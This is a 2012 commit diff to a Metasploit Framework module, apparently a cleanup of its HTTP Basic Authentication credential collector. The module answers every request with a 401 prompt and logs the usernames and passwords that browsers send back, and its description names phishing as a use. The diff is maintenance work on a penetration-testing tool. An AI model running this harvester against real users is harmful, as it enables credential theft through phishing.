Some more changes before pushing to master

2012-08-20 15:43:39 -05:00 · 2012-08-20 15:43:39 -05:00 · 8d4b4fc7be
parent 9a1c63d38a
commit 8d4b4fc7be
1 changed files with 24 additions and 25 deletions
--- a/modules/auxiliary/server/capture/http_basic.rb
+++ b/modules/auxiliary/server/capture/http_basic.rb
@ -1,18 +1,23 @@
-require 'msf/core'
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##

+require 'msf/core'

 class Metasploit3 < Msf::Auxiliary

 	include Msf::Exploit::Remote::HttpServer::HTML
 	include Msf::Auxiliary::Report

-	def initialize
-		super(
-			'Name'        => 'HTTP Client Credential Catcher',
-			'Version'     => '$Revision:  $',
+	def initialize(info={})
+		super(update_info(info,
+			'Name'        => 'HTTP Client Basic Authentication Credential Collector',
 			'Description'    => %q{
 				This module responds to all requests for resources with a HTTP 401.  This should
-				cause most browsers to prompt for credentials.  If the user enters Basic Auth creds
+				cause most browsers to prompt for a credential.  If the user enters Basic Auth creds
 				they are sent to the console.

 				This may be helpful in some phishing expeditions where it is possible to embed a
@ -20,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary

 				This attack is discussed in Chapter 3 of The Tangled Web by Michal Zalewski.
 			},
-			'Author'      => ['saint patrick <saintpatrick@l1pht.com>'],
+			'Author'      => ['saint patrick <saintpatrick[at]l1pht.com>'],
 			'License'     => MSF_LICENSE,
 			'Actions'     =>
 				[
@ -31,12 +36,12 @@ class Metasploit3 < Msf::Auxiliary
 					'Capture'
 				],
 			'DefaultAction'  => 'Capture'
-		)
+		))

 		register_options(
 			[
 				OptPort.new('SRVPORT', [ true, "The local port to listen on.", 80 ]),
-				OptString.new('REALM',    [ true, "The authentication realm you'd like to present.", "Secure Site" ]),
+				OptString.new('REALM', [ true, "The authentication realm you'd like to present.", "Secure Site" ])
 			], self.class)
 	end

@ -51,14 +56,10 @@ class Metasploit3 < Msf::Auxiliary
 		@realm    = datastore['REALM']

 		print_status("Listening on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}...")
-		exploit()
+		exploit
 	end

 	def on_request_uri(cli, req)
-		phost = cli.peerhost
-		mysrc = Rex::Socket.source_address(cli.peerhost)
-
-
 		if(req['Authorization'] and req['Authorization'] =~ /basic/i)
 			basic,auth = req['Authorization'].split(/\s+/)
 			user,pass  = Rex::Text.decode_base64(auth).split(':', 2)
@ -73,16 +74,14 @@ class Metasploit3 < Msf::Auxiliary
 				:active      => true
 			)

-			print_status("HTTP LOGIN #{cli.peerhost} > :#{@myport} #{user} / #{pass} => #{req.resource}")
+			print_good("#{cli.peerhost} - Credential collected: \"#{user}:#{pass}\" => #{req.resource}")
 			send_not_found(cli)
 		else
+			print_status("Sending 401 to client")
 			response = create_response(401, "Unauthorized")
 			response.headers['WWW-Authenticate'] = "Basic realm=\"#{@realm}\""
 			cli.send_response(response)
 		end
-
-		return
-
 	end

 end